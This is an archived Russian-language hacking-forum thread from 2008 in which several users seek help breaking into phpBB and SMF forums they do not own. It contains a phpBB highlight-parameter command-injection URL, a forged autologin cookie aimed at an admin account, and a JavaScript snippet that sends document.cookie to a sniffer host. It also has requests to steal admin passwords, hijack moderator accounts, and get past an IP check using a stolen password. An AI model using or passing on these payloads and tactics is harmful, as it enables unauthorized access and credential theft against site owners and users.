ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

18.11.2008, 21:43
|
|
Новичок
Регистрация: 18.11.2008
Сообщений: 1
Провел на форуме: 10719
Репутация:
0
|
|
Здраствуйте.
подскажите пожалуйста начинающему..
есть форум. 100% дырявый..
phpBB
Через чанлог выяснил что 2.0.5
через /INSTALL 2.0.6
далее не знаю чем продолжить...
1) посмотрел видео (мне кажется достаточно известное) bazaphpbb, попробовал
Код:
http://сайт/forum/viewtopic.php?t=123456&highlight=%2527.$poster=`pwd`.%2527
(где 123456 как я понимаю номер темы)
ничего не выходит.
учетной записи id2 - нет.
Но точно знаю пользователей с правами админ - это 7 и 456.
подскажите пожалуйста что можно сделать ??
HTML выключен (в подписи в том числе)
P.S. пробовал замену куков
Код:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%227%22%3B%7
после чего зашел на форум заново. куки изменились. в одной
b%3A0%3B
в другой
c66d207fa56c2bb04c041c1ef1a54589
Последний раз редактировалось Schneider; 18.11.2008 в 22:28..
|
|
|

18.11.2008, 22:16
|
|
Новичок
Регистрация: 18.11.2008
Сообщений: 7
Провел на форуме: 25855
Репутация:
0
|
|
Сообщение от cash$$$
NooB MC
А не проще зделать так?
Код:
<script language=JavaScript>
document.images[0].src="http://sniff/sniff?"+document.cookie
</script>
Составил такой документ
<html>
<head>
<title> proverka </title>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1251">
</head>
<body>
<script language="JavaScript">
document.images[0].src="http://na-s.ru/images/***********_1.gif?"+document.cookie;
</script>
</body>
Но к сожалению ничего не выходит.
(при использовании этого совета картинка должна
быть видимой или нет?)
</html>
|
|
|

19.11.2008, 15:22
|
|
Новичок
Регистрация: 18.11.2008
Сообщений: 7
Провел на форуме: 25855
Репутация:
0
|
|
Посоветуйте ещё что нибудь, очень сильно надо.
|
|
|

20.11.2008, 00:00
|
|
Новичок
Регистрация: 19.11.2008
Сообщений: 2
Провел на форуме: 10838
Репутация:
0
|
|
Господа! Есть smf 1.1.3, вероятней всего без заплаток за последние полгода.
Нужно: выудить пасс админа.
Пробовал заэксплойтить, однако экспы пробовал только через perl, большинство где-то стопорилось.
Один прошел: SMF <= 1.1.4 SQL Injection Exploit, но выдал сообщение о "неуязвимости" форума.
Заливка шелла по описанным тут http://forum.antichat.ru/thread43633.html способам невозможна: нет доступа к админке, на форуме прикрыто выкладывание файлов.
Что и как ещё можно сделать? очень хочется пробиться туда?
Хелп?
|
|
|

20.11.2008, 00:06
|
|
Участник форума
Регистрация: 16.06.2006
Сообщений: 179
Провел на форуме: 515368
Репутация:
135
|
|
Есть smf 1.1.3, вероятней всего без заплаток за последние полгода.
А чё ты так решил? Может всё последнии заплатки установлены и не факт, что там именно 1.1.3 написать в копирайтах можно что угодно. Поищи дыры в движке самого сайта.
|
|
|

20.11.2008, 00:13
|
|
Новичок
Регистрация: 19.11.2008
Сообщений: 2
Провел на форуме: 10838
Репутация:
0
|
|
Сообщение от FraiDex
А чё ты так решил? Может всё последнии заплатки установлены и не факт, что там именно 1.1.3 написать в копирайтах можно что угодно. Поищи дыры в движке самого сайта.
Знаю владельцев форума лично просто. Админа как такового там нет.
Проблема в том что я все эти вещи, описанные постом выше сегодня вижу первый раз и, честно говоря, мне немного сложно осознать что, к чему, куда и зачем.
|
|
|

20.11.2008, 19:00
|
|
Новичок
Регистрация: 25.12.2006
Сообщений: 2
Провел на форуме: 120487
Репутация:
0
|
|
--------------------------------------------------------------------------------
Вообщем, прошу помочь со взломом форума.
Похоже это та же borda.
требуется повысить себе права для чтения закрытой ветки. Ну или увести ак модера.
От вас жду ссылок или советов
|
|
|

22.11.2008, 15:01
|
|
Познающий
Регистрация: 12.01.2007
Сообщений: 35
Провел на форуме: 144000
Репутация:
6
|
|
Помогите плизз... кароче у меня есть форум есть админ ну на форуме стоит проверка на IP пишет что с своего аипи я не могу заити ! что мне здлелать чтоб попасть в админку
|
|
|

22.11.2008, 15:05
|
|
Постоянный
Регистрация: 18.08.2007
Сообщений: 846
Провел на форуме: 5585816
Репутация:
1236
|
|
Сообщение от skiff18
Помогите плизз... кароче у меня есть форум есть админ ну на форуме стоит проверка на IP пишет что с своего аипи я не могу заити ! что мне здлелать чтоб попасть в админку
непойму... форум твой? у тебя есть доступ к фтп? если он твой в чём же проблема? измени доступ к админке на свой ip и вообще юзай поиск
|
|
|

22.11.2008, 15:13
|
|
Познающий
Регистрация: 12.01.2007
Сообщений: 35
Провел на форуме: 144000
Репутация:
6
|
|
форум не мои просто достал пасс админа а заити не могу
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|